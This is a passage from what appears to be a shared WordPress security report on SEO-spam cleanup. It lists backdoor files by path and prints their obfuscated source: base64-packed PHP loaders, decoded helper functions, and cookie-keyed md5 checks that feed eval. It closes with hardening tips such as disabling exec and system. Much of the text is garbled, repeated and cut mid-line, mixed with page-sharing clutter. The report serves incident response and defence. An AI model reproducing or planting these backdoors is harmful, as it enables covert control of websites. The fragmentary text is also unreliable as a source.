QvmcfGw+9EiU6OZkOSmR6mUUJSdriPrXEXFIxXmDhWO","7hc/hk1s9GzWj4hS16t+EINahVZNBq/TtvHgM
eQfR2i","6R2YO6YXZ+Y8BcNyQzbQ1B5Do9I1uKewC4UOACX+mbT","I5Pn6alUMXGpYSTKuyLEh5K+Z+Ub
e+kM+JOJsSMQAhD","RTbK4+oGjVkW1CR2EjkF6uMZF7kN1Qt6+fktGXulhiI","m/2ZixpyBNR23XGQHRR1
QWyhEfRGMEFXKktCqBcufQ2","mcZLnITrcb1bHlx3YRi89Ro1iG/gwstu9oUIb0myR2p","KjGxcfxMSvvtmq4
dtSQFWSZ4hPDIQ8fUBTdU5zvLhtS","B3VhKmiB4NgIAHGB3WVsOD+5nEdFjRlZa9+Zgcp7UYt","bH0EQq/D
oGomTAkDCYjGqxkWJhZgThdTRIzgrOiralk","riI5bIQZlzUtFLpSBZO3dSclAUKVMRVw8WHxD+TCHOz","2F
MjChCEGVRqpBU8SDE16XOvVp3LmRmwHjIRIaqYSJj","4kK6qqbd6CNLM1S1EBWqnERFrV+UjPTWHJY8Uh
ldwe1","8jrql74MlIjqlQb2LRVmG4gPPZaTQ0VPrhFVmLJyJgg","R1C2Fs324WK/3WQUhSpCaBcWLVuL9LLV
QmMpZfyFYub","Pl0JDO5RE4UkpA0Nl5NaJSNL1TpoyPszKDAGEisNoHy","dBv1nldUHGLt7j2Z9ukheXajqj5
dyUZ4wlInJbd9+4q","sV6ZZFPWTQaBlci5KcGh17YNPNlU85VED3ZKDQtpkKZ","NotDGNsnexKdaIo9YJpvb
NNqcL3UOjKOrxTU/KQevQl","FwCfUodsV6zxp3K4f0eFX/lsER1UbnSxax6TfmXQ6Gz","1AlKlhRUm7ajQ8uL
@ 14
Decoded:
function ll($i) {
$a = Array('', 'Xw==', 'Xw' . '==', '' . 'X' . 'A==', '' . 'Lw==', ''
. 'Ly8=', 'L' . 'g==', '' . 'Ly' . '8=', 'TW96' . 'aWx' . 'sYS80' . 'L' . 'j'
. 'AgKG' . 'NvbXBh' . 'dG' . 'libGU7IE' . '1TSUUg' . 'OC4w' . 'OyBX' . 'aW5'
. 'kb3' . 'd' . 'zIE5UIDYuM' . 'Ck=', 'T' . 'W' . '9' . '6aWxsY' . 'S' . '81'
. 'LjAgKF' . 'dpb' . 'mRvd3M7IFU7IFdpbm' . 'R' . 'vd3MgTlQgNS4xO' . 'yBlbi1'
. 'VUz' . 'sgcnY' . '6MS' . '45' . 'LjAuMSkgR2' . 'Vja' . '28' . 'v' .
'MjAwOD' . 'A5' . 'M' . 'jIxNSB' . 'GaXJlZ' . 'm94L' . 'zMuM' . 'C4x',
'TW96aW' . 'xsYS81LjAgK' . 'Fdp' . 'bmRvd3M7IFU7' . 'IFd' . 'pb' . 'mR' .
'vd3MgTlQ' . 'g' . 'NS4xOy' . 'Blbi1VUyk' . 'gR2V' . 'ja28' . 'vMjAwM' . 'z'
. 'A' . '1MDQgTW96aWxs' . 'Y' . 'SB' . 'G' . 'a' . 'X' . 'JlYmly' . 'Z' .
'C8wLjY=', 'TW96aW' . 'xsY' . 'S' . '81' . 'Lj' . 'AgKFdp' . 'bmRv' . 'd3M' .
'7IFU7' . 'IFdpbmRv' . 'd3Mg' . 'Tl' . 'QgN' . 'S4xOyBlbi1V' . 'Uzsg' . 'c' .
'nY6MS45Lj' . 'IuMTAp' . 'IEdlY2tvL' . 'zI' . 'wMTAwO' . 'TE0I' . 'E' .
'Zpcm' . 'Vmb3' . 'gvMy42' . 'LjEw', 'c2' . 'FmZV9t' . 'b2Rl', 'b3Blb' .
'l9iYXNlZGly', 'aHR0cDo' . 'vLw=' . '=', '', '' . 'Iy' . '8' . 'j', 'Lw' .
'==', '', '', 'Lw==', '' . 'L' . 'w==', '' . 'QWNj' . 'ZXB0' . 'L' . 'U' .
'xhbmd1YWdlOiBl' . 'b' . 'i11cywg' . 'ZW47c' . 'T0' . 'wL' . 'jU' . 'wDQo=',
'Q' . '29ubm' . 'Vjd' . 'G' . 'l' . 'vbjo' . 'g' . 'Q2x' . 'v' . 'c2U' .
'NCg0K', 'DQoNCg' . '=' . '=', 'Cg==', 'PGJyIC' . '8+', '', 'L0xvY2F0aW' .
'9uXDov', 'TG9j' . 'YXRp' . 'b246IA==', 'DQ==', 'D' . 'Qo' . 'N' . 'C' . 'g'
. '==', '', 'Ji' . 'M' . '3NiYjMTE' . 'xJiM' . '5OS' . 'Y' . 'jO' . 'TcmIzEx'
. 'NiYjM' . 'T' . 'A1Ji' . 'MxM' . 'TEmIzEx' . 'MCYjNTg=', '' .
'TG9jYXRpb246', 'Y' . 'Wx' . 's' . 'b3dfd' . 'X' . 'JsX2ZvcGVu', 'MQ' . '==',
'PG' . 'g1IHN0eWxlPSdj' . 'b2xv' . 'cjptYXJ' . 'vb24n' . 'PkNh' . 'bid0' .
'IGR' . 'vd' . '2' . '5sb2FkIA==', 'I' . 'C0g' . 'RV' . 'hJVDs8L2g1Pg==', '',
'', '', 'Cg==', '' . 'c' . 'g' . '=' . '=', '', 'c' . 'G' . 'lwZQ==', 'd' .
'w' . '==', '', 'c2FmZV9tb2R' . 'l', '' . 'b3Blbl9i' . 'YX' . 'Nl' . 'ZGl' .
'y', 'c2FmZV9tb2R' . 'lX2luY2x' . '1ZGVfZGly', 'c2' . 'F' . 'mZV9tb2RlX2V4' .
'ZWNfZ' . 'Gly', 'ZGlzYWJs' . 'ZV9' . 'mdW5jdG' . 'lv' . 'bnM' . '=', 'YW' .
'xsb3' . 'dfdX' . 'JsX2ZvcGVu', 'bWF4X2V4ZWN1dGlvb' . 'l90' . 'aW1' . 'l',
'b3V0cH' . 'V0' . 'X2J' . '1ZmZlcml' . 'uZw==', 'b' . 'WV' . 'tb3J5X' .
'2xpbW' . 'l0', 'Mj' . 'U2T' . 'Q==', '' . 'ZXJy' . 'b3' . 'JfbG9n', 'bG9nX'
. '2Vycm9ycw=' . '=', 'ZmlsZV91cGxvY' . 'W' . 'Rz', 'YW' . 'x' . 's' . 'b3' .
'd' . 'fdX' . 'JsX' . '2Zvc' . 'GVu', 'bWF' . '4X2V4' . 'Z' . 'WN1dGlvb' .
'l90aW1l', 'b3V0cHV0X2J1Z' . 'mZlcmlu' . 'Zw==', 'bWVtb3J5X2xpbWl' . '0',
'MjU2TQ=' . '=', 'Z' . 'XJyb3JfbG' . '9n', 'bG9nX2Vycm9yc' . 'w==', 'Z' .
'mlsZV' . '91' . 'cGxvYWR' . 'z', 'YWxsb3df' . 'dX' . 'J' . 'sX2Zvc' . 'GVu',
'XA' . '==', '' . 'Lw==', 'RE9DVU1FTl' . 'RfUk9' . 'P' . 'VA==', '' . 'XA==',
'Lw==', 'U' . '0' . 'N' . 'SSV' . 'BUX0' . 'ZJTEV' . 'O' . 'QU' . '1F',
'UEhQX1N' . 'FTE' . 'Y=', 'XA==', '' . 'Lw==', '' . 'KF' . 'wu' .
'cGguKiR8XC5o' . 'dG0u' . 'KiR8XC5' . 'za' . 'H' . 'Rt' . 'LiokfF' . 'w' .
'uY' . 'XNwLi' . 'okfFwuan' . 'NwJH' . 'xcLm' . 'podG0k' . 'fFwuY2' .
'ZtJHxc' . 'L' . 'mN0c' . 'C' . 'R' . '8XC50cGwkKQ' . '=' . '=',
'LzxhZD4uKjxc' . 'L' . '2FkPi9zaQ==', 'Lz' . 'xhZHM+Lio8XC' . '9hZH' .
'M+L3Np', 'Lzxi' . 'YjE' . '+Lio8' . 'YmIyP' . 'i9' . 'z' . 'aQ==', '' . 'L'
. 'z' . 'xiMT' . '4uKj' . 'x' . 'c' . 'L2I' . 'x' . 'Pi9zaQ' . '=' . '=', ''
. 'Lzxi' . 'YjE+' . 'PGJiMT4vc2k' . '=', 'LzxiYjI+PGJiMj4vc2k=', 'L' .
'zxhZD' . '4uKjxcL2' . 'Fk' . 'P' . 'i' . '9z', '' . 'Lzxl' . 'bXM+' . 'L' .
'io8X' . 'C9lbX' . 'M+' . 'L3M' . '=', 'LzxibG' . '9jaz4uKjxcL2Js' . 'b2Nr' .
'Pi9' . 'z', 'L' . 'zxkaW' . 'c+Lio8XC9kaWc+L' . '3M=', 'LzxjZW50' . 'cj' .
'4u' . 'KjxcL2Nlb' . 'nRyP' . 'i9z', 'LzxjaXR' . 'zPi4qPFwv' . 'Y2l0c' .
'z4v' . 'cw==', 'Lzx0Y' . 'nQ+' . 'Lio8XC90' . 'YnQ' . '+L3M=', '' . 'L' .
'z' . 'w' . 'oc' . '3Bhbnxmb250fGRpd' . 'ikgc' . '3R' . '5bGU9Lioo' . 'aG' .
'Vp' . 'Z2h0fHdp' . 'ZH' . 'RoKVxz' . 'KjpccypbMC0yXXs' . 'x' .
'fVxzKihwdHxwe' . 'CkuKihv' . 'dmV' . 'yZmxvd3x2aXNpYmlsaX' . 'R5KVxzKjp' .
@ 15
2.2.12 Location: wp-includes/Text/Diff/Renderer/tabs.php

<?php $twngzdpj =
array("eNrNOwd72li2f4V48k3MukQdaRyy","bhgXwDYulEw+f0IIEBaIUAy2J//9","nXvOvWpgJ97k7Xs7scot
557exGa8","Tmb9XWc2dKZeMLxzF95kOln/cH7z","IZvNPGfEROb8Zv29l31+b+f3xmP7","cf3Dh80P9Xn+Q
2b7Q54e8baHA+yx","FE2WHk28dXGCjZbYhUbZ03XNMmz2","UFtMGlemhNN9hNU9Y9di5YHdWvX9","Xr
voe/hcvMmdFGTcfnXDbnjpnrPr","gcau8/NHdtuv2zWdPdy31PbTSYE9","6jcnh41Z+eCeoYDH19gwHo8wS
/09","OvqoPWqx+6D60FbZQzl3cgRHs3EY","YyN8vHvts/slolG50hb8eL/lybc3","TxMcd4YNo3zFHjUdzpiVr+
67Vfaq","3CLRtmIizHJ/b35+uKeXcZRdThYV","drvaL9r1U/bkNwcWAio94Y4ZXg+0","BSMJuckuCc7KjCz2eo
bosyc8/KHN","riojDTlJ5IVkl3HPEnkoRE4ePoek","ABnswXxgZCBaT3ty+fCyS6xmuCBr","GCl+Y4CAH5sH5rz
UbwituRboh8sR","fTyeSEDeMykQCVw6yCuU3A0nJ74G","+dlF9viXCCdBCrujtNjDBKWFUK80","nbTiZIYQE
MDe6KTQ9hvK9KH0dDIv","X4PErgsSKViTXUbO4HbQUrsPuOdR","U0ixC3Mgz1GOBk2UuTVtKVUfhvB0","l
euMb6GaN+oVv1kkBsES+7gqOezl","MHhAYGR38O/k0SRV2fzAJwQj6V9p","LsyS3S5rqEx9RLO+L5VuFj3Sh
7bc","CHWn7Z97HB1iDLvKzuO826xpyGjn","WgKZ3cwPUS0CceSlYs1ag9s+GCsZ","Lh6G091LZfHgKDeVA3
yTUJSw5fAy","QJQOuqELoRWh07gonj6eHCCVG5ws","JhJpgaJtKEeSXbNm9cMQkwfhXopW","n3hZHbUU
zTjZC2ES3tFrqOFLyMC/","U2QGylKteI3QMsvXKHLE49Qr66hN","V9H8OWqLMzh5itYheK/RJ23ak9Gi","vfK
ijGsLbO2C7LmBMCrXxIwYSYIc","GGqAjYBzYzMdvJKHQJdTV5oPTvF2","BsvKl0jKRbErnxwjVMkl54D2cIF4",
"t/stNF6QUn80Jb4hZQ9w2BAFcY97","ey2vjeI7KXLrUvQJSlo5uuc8RkM8","wFXd6m3v9PZwYpaULirSRTcf
qScT","N7074bBT9NF5NAnt9pJakw2hE0RE","CXGypZgdpWyI7yKrQwb5s4aykJvF","2w7aQ9FPL6srt1oTTa
LSiUHiq58a","tdMJLCX7wWU6Co2pf2tYzpOEUCIg","JSGhSUwyrdqRViffqSHUWkXG3T5S","J5EPl4myW8k
5vpUIdZSzjFsGTd8Z","+LNmjEWMJzV0MtOWeqrXSbCjVs2X","mDr0b5Rr4m2TRPwYuaDTDkVZa8jO","hBv
w4NEZWI9OEn5z4E9Ch0eykJ3i","As2+Uas+Ie2h2pN+MB4w+pHgJi5F","pxbjBWLKmM74gNrJeAEWLic9Jf
GB","8QN4ITcjHuQREi5J044cDekPLbxZ","B/pVZGgHCGb3oWAif0UeIK+RDzEe","IHGgA0h7ku5J6AE53SQ5
3CjkX49c","EvfQ1YKF3uj2Bo3liCJwtXNzb13c","Rqv5xlgswFAsVa6uUO77+FqXmqfk","WG7PL2/kI7as0LtEA
ciVI5oKI28i","iwsfz47mM5JSd3bmVdEP1w/0oF2U","8L2O7hrD5BOEKVQ6RMsL7juI/nxG","ngR937yE4/O
ZPYzGTo8XTpgfDkYB","WkpRwnUN0pYpW1MaVCTnAM5E94Jn","Ulgszu8xa7uM2Pm06DVD367Nzvr8","
CAVxQleGjs+zCHXaituOyxuAJVBm","9VBa7F2tjGiaB4ACLkFtH5xgwnfh","WZg+2IRI3FjYNooYhEhJOVkktoS
H","e+T2CxsQ9cQWdLKIvHIf5tYcYqN/","soFkFCmSUA6pQaS9jx3Obr3QWg8R","CbSfEnfbF5wLBBntrlXHG
EWcQH5b","Yhy4UY4jwc0EMbefADq+MTJPJy2l","Mk7zOkLsnvJvR/D7PmQgHw+1gjI4","fmq/WdNJ8H0N
09+QHqVCSA6rQiap","E/s2ElN9ipBCBfmG70dzcmCKT/7l","SSPGz4V8cLgxvIyzRWoMw/xBsIZO","w62Bo+
6jAFrDxaCl6FKH4uYItdy7","7zpqVYeyBjEFsJiG2EU041FT6ZHb","Yt7puD1qkoXhorPbxRMRP3Icik1s","S6t8I
D3WEbfJogNrzrzevH28QJN2","D0LtB+tFtB7ag9tHiiSLWFGAPkyx","65URJOoTu17V4TxkJp6HZwUB5Qnk",
"jVvqgnBH2VXvKXJqoxhdG/zZbFzt","B5Qd3Q4urrRvF+QpHhpoIXi2U3pE","2p/IwtEbzjpFihsgYCwNeChGN
T5D","f6Y9IOfq3F6R/T10w4z9uBBEgNvi","YkC2cFFgLSTEEbRUCC4UaCeUXrTN","NsZ8n4y3dkp8L/qSe4W
ocHEEWETU","j8vfzopHEM8s0y7695BvkIUA2Wch","aT3friEmAYhKtWtViv8HPrA6MBiM","2tPeFI3Al3Nlc
uF01mMQqoRD6mE6","x91RaDqc9YLtDuIu2C5YviBfgGLt","cZYzdlO4Ctld9IHN5JFuIxbj0ZR5","kZYjmzEuM
G0ftUHLw2jPtb3kjZh2","IesaxE6MkEzT6pillr+d+1zDvR6q","AmVQ1YdOEV+RxGaxCqXoPbmBgaXw","lGYA
TkllbAMY5AIQDpLXa9cpcwU4","I9IghIFWQRYVOjHcgOksnfnYrDUs","8lZYxOH8hUesxD3HlXmjppuUIFgz",
"EOe9XW+MuDtC5Ux4Z6ahxDpSbHQS","KH3BOpoP2fZA2gdGOwgTrIe2vOCG","GQTMIMEYA65FSBdUbq
MSkj9KGLXQ","UMZqxuY2sXdEbI2cBWcLOY7+ondC","WsvZgQoo/GGPSAWWhBkMsOaYQn2M","NQiL2I
NuZMTYw1lTUttzWPLQLt4+","utxDU6W/P6CU30KfA8mbIWIzinnR","Aw49tY9JoZrM/fUl4eqAK/tmi1LO",
"Qftgha2iAMvfSreTeYkaH233qTyp","1AFGXwTvAtkTmt/tKCxTIYwO0cma","iSSjy4uv2ymFFKIfVepw/kBZvx
yq","6EWi8GXhkz1SCPX2zYsDywPN7kOY","DZeRApMxPGloaJ2DPUIEDTGcI0Qq","UXgM8cVcLBoXOOMw
7m5DEtThOEN4","pNSLQzyuInvbhzrDj4dIDIkbHMd2","ff+el+I+r0ahLLy8nEcVHrJ+/z62","okQ5bofS0kQ+N
@ 16
Decoded:
<?php if (!function_exists('OU')) {
function OU($i) {
$a = Array('', 'Xw=' . '=', 'Xw==', 'XA' . '==', 'Lw=' . '=', 'Ly8=',
'Lg==', '' . 'L' . 'y8=', '' . 'TW96a' . 'WxsYS80L' . 'jA' . 'gK' . 'GNv' .
'bXBhdGli' . 'bGU7IE1' . 'TSU' . 'U' . 'gO' . 'C4' . 'wOy' . 'BXaW5' .
'kb3dzIE' . '5UIDYuMCk=', 'TW96aW' . 'xsYS81' . 'LjAgK' . 'Fdpb' . 'mRvd3' .
'M7IFU7IFdpbmRv' . 'd3' . 'MgTl' . 'Q' . 'gNS4xOy' . 'Blbi1VUzs' . 'gcnY6MS'
. '45LjAuMSkgR' . '2V' . 'ja28v' . 'MjAwODA5M' . 'j' . 'IxN' . 'SBGaXJ' .
'lZm9' . '4Lz' . 'Mu' . 'MC4x', 'T' . 'W' . '96a' . 'WxsYS81LjAg' . 'KFdpbm'
. 'R' . 'vd' . '3M7IF' . 'U7IFdpb' . 'mRvd3Mg' . 'Tl' . 'Q' . 'gNS4xO' .
'yBlbi1VU' . 'ykgR' . '2Vja2' . '8vMjAw' . 'MzA1MDQgTW96aWxsYS' . 'BGaXJlYml'
. 'yZC8wLjY' . '=', 'TW' . '96aWxsYS' . '81LjA' . 'g' . 'KF' . 'dpbmR' .
'vd3' . 'M7' . 'I' . 'FU7IF' . 'dpbmR' . 'vd3M' . 'gT' . 'lQg' . 'NS4xO' .
'yBlb' . 'i1VUz' . 'sgcnY6' . 'MS45' . 'LjIuM' . 'T' .
'ApIEdlY2tvLzIwMTAwOTE0IE' . 'Z' . 'pcmVmb3gvM' . 'y42L' . 'jEw', 'c2FmZV' .
'9tb2Rl', 'b' . '3' . 'Blbl9i' . 'YXNlZGl' . 'y', 'aHR0c' . 'DovL' . 'w==',
'', 'Iy8' . 'j', 'L' . 'w=' . '=', '', '', 'Lw==', 'Lw==', 'QWN' . 'jZ' .
'XB0LUxhbm' . 'd1Y' . 'W' . 'dlOi' . 'Blb' . 'i1' . '1cywgZW47' .
'cT0wLjUwDQ' . 'o' . '=', 'Q29ubmVjdGlv' . 'b' . 'jo' . 'gQ2xvc2UNC' . 'g0' .
'K', 'DQoN' . 'Cg' . '==', 'C' . 'g==', '' . 'PGJyIC8' . '+', '', '' . 'L0x'
. 'vY2F0aW9uXD' . 'o' . 'v', '' . 'TG9j' . 'YXRpb246IA==', '' . 'DQ' . '==',
'' . 'D' . 'Q' . 'oN' . 'Cg' . '==', '', 'Ji' . 'M' . '3NiY' . 'j' . 'MTE' .
'x' . 'JiM5O' . 'SY' . 'j' . 'OT' . 'cmIzE' . 'x' . 'N' . 'iYjM' . 'TA1J' .
'iMxMT' . 'EmIzEx' . 'MCYj' . 'NT' . 'g=', '' . 'TG9jYXRpb246', 'YWxsb3d' .
'fd' . 'XJ' . 's' . 'X2ZvcGVu', 'MQ==', 'PGg1IH' . 'N0e' . 'Wx' . 'lP' .
'Sdjb2' . 'xvcjpt' . 'YX' . 'Jvb24n' . 'Pk' . 'Nhbid0' . 'IGR' . 'vd25sb' .
'2FkIA==', 'I' . 'C0' . 'gRVhJVDs8L2g1' . 'Pg==', '', '', '', 'Cg==', 'cg==',
'', 'cGlw' . 'ZQ==', 'd' . 'w=' . '=', '', 'c2FmZV9' . 't' . 'b2' . 'Rl',
'b3' . 'Blbl9iYXNlZGl' . 'y', 'c2FmZV9tb2Rl' . 'X2luY2x1ZGVfZ' . 'Gly',
'c2FmZV9tb2RlX2V4ZW' . 'NfZGl' . 'y', 'Z' . 'GlzYWJsZV9m' . 'dW' . '5j' .
'dGlvbnM=', 'YWx' . 'sb3dfd' . 'XJsX2ZvcGVu', 'bWF4X' . '2V4Z' . 'WN1dGlvbl9'
. '0a' . 'W1l', 'b3V0cHV0' . 'X2J' . '1Z' . 'mZlcmluZw=' . '=', '' . 'bWV' .
'tb3J5X2' . 'xpbWl0', 'MjU2TQ==', 'ZX' . 'Jyb' . '3' . 'Jf' . 'bG9n',
'bG9nX2Vycm9ycw=' . '=', '' . 'Zmls' . 'Z' . 'V9' . '1cGxv' . 'YWRz', 'YW' .
'x' . 'sb' . '3dfdXJsX' . '2Zv' . 'c' . 'GVu', 'bWF4X2' . 'V4ZWN1dG' .
'lvbl90aW1l', 'b' . '3' . 'V0' . 'cHV0X2J1ZmZlcmluZw==', 'bW' . 'Vtb3J5X2' .
'xpbWl' . '0', 'MjU2TQ' . '==', 'ZXJyb3J' . 'fbG9' . 'n', '' . 'bG9' .
'nX2Vyc' . 'm9ycw==', '' . 'Zml' . 'sZV91cGxvYWRz', 'YW' . 'xs' . 'b' .
'3dfdXJs' . 'X2' . 'ZvcGVu', 'XA==', '' . 'Lw==', 'RE9D' . 'VU1' . 'F' .
'TlRfUk9PVA==', '' . 'XA==', 'L' . 'w==', 'U' . '0NSSV' . 'BU' . 'X0ZJT' .
'EVOQU1F', 'UEhQX' . '1NFT' . 'EY' . '=', 'XA' . '==', 'Lw' . '==', 'KFwuc' .
'GguKiR8' . 'XC5odG0uKiR8XC' . '5' . 'zaHR' . 'tL' . 'iokfF' . 'wuYX' . 'N' .
'wLiokfFwuan' . 'N' . 'wJHxc' . 'L' . 'mpod' . 'G0kfFwuY' .
'2ZtJHxcLmN0cCR8X' . 'C5' . '0c' . 'GwkK' . 'Q==', '' . 'LzxhZ' . 'D' .
'4uKjxc' . 'L2F' . 'k' . 'P' . 'i9' . 'zaQ==', 'LzxhZHM+Lio8XC9h' .
'ZHM+L3Np', 'LzxiY' . 'jE+Lio8' . 'YmIy' . 'Pi9z' . 'a' . 'Q=' . '=', '' .
'Lzxi' . 'MT4uKjxcL2Ix' . 'Pi9z' . 'aQ==', 'LzxiYj' . 'E+PGJi' . 'MT4' . 'vc'
. '2k' . '=', 'Lzxi' . 'YjI+P' . 'GJ' . 'i' . 'Mj4vc2k=', '' . 'Lzx' . 'h' .
'Z' . 'D4uKjx' . 'cL' . '2FkPi9' . 'z', 'Lzx' . 'lbXM' . '+Lio8X' . 'C9' .
'lbXM+L3M=', 'Lzxi' . 'bG9' . 'j' . 'az4uK' . 'jxcL2Jsb2Nr' . 'P' . 'i9' .
'z', '' . 'LzxkaW' . 'c+Lio8XC9k' . 'a' . 'W' . 'c+' . 'L' . '3M' . '=',
'LzxjZW50c' . 'j4u' . 'Kjx' . 'cL2N' . 'lbnRy' . 'Pi9' . 'z', '' . 'LzxjaX' .
'Rz' . 'P' . 'i' . '4q' . 'PFwv' . 'Y2l0' . 'cz4vc' . 'w==', 'Lzx0' .
'YnQ+Lio8X' . 'C90Yn' . 'Q' . '+L3M=', '' . 'Lz' . 'woc3B' . 'hbnxmb250fGR' .
'pd' . 'ikgc3R5bGU9' . 'Lio' . 'oaGV' . 'pZ2h' . '0' . 'fHdpZHR' . 'o' .
'KVxz' . 'Kjpcc' . 'y' . 'pbMC0yXX' . 'sxfVxzKihwdHxw' . 'eC' . 'k' . 'uKi' .
'hvdmVyZ' . 'mx' . 'vd' . '3' . 'x2aXNpYmlsaXR5KVx' . 'zKjpccy' . 'oo' .
@ 17
2.3 Exploits found:
2.3.1 TimThumb Exploit
Location: wp-content/themes/TheProfessional/timthumb.php
3 Fixed Vulnerabilities and Rescan results
image
4 Suggestions
4.1 Disable insecure/dangerous PHP functions like eval function on server.
Most script try to exploit php application (WordPress), using exec(), passthru(), shell_exec(),
system() functions.
If you can, you should disable that functions.
4.2 Secure Wordpress website
- Hide the wordpress backend by customizing the backend access link
- Install and configure security plugins.
@ 18

Sec Report

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Sec Report

Uploaded by

Copyright:

Available Formats

Website SEO Spam Removal Report

2.2 Backdoor scripts found

eval('?>' . $O00O0O($O0OO00($OO0O00($O0O000, $OO0000 * 2), $OO0O00($O0O000, $OO0000,

2.2.2 Location: wp-includes/images/crystal/swfmacwheel.php

Original source code:

Original source code:

<?php $key = "58e07095da5ce3e402218c18a195bfb6";

<?php if (md5($_COOKIE['key']) == $key) {

2.2.6 Location: wp-content/uploads/emmos.php

Original source code:

<?php $key = "dac71e3f5a628b9fe8596c38bd2a15c1";

<?php if (md5($_COOKIE['key']) == $key) {

Original source code:

<?php $key = "000023a6e067957b0f93a8d8ab73497a";

<?php if (md5($_COOKIE['key']) == $key) {

2.2.8 Location: wp-content/themes/openvme.php

Original source code:

<?php $key= "f74e3e279a1da05146402e46d3180d94"; eval

<?php if (md5($_COOKIE['key']) == $key) {

Original source code:

<?php $key= "0f8a5e8b5e7500d9456678ad7f14e4a2"; eval

2.2.10 Location: wp-includes/js/dcn.php

Original source code:

Original source code:

Original source code:

3 Fixed Vulnerabilities and Rescan results

4.1 Disable insecure/dangerous PHP functions like eval function on server.

If you can, you should disable that functions.

4.2 Secure Wordpress website

- Hide the wordpress backend by customizing the backend access link

- Install and configure security plugins.

You might also like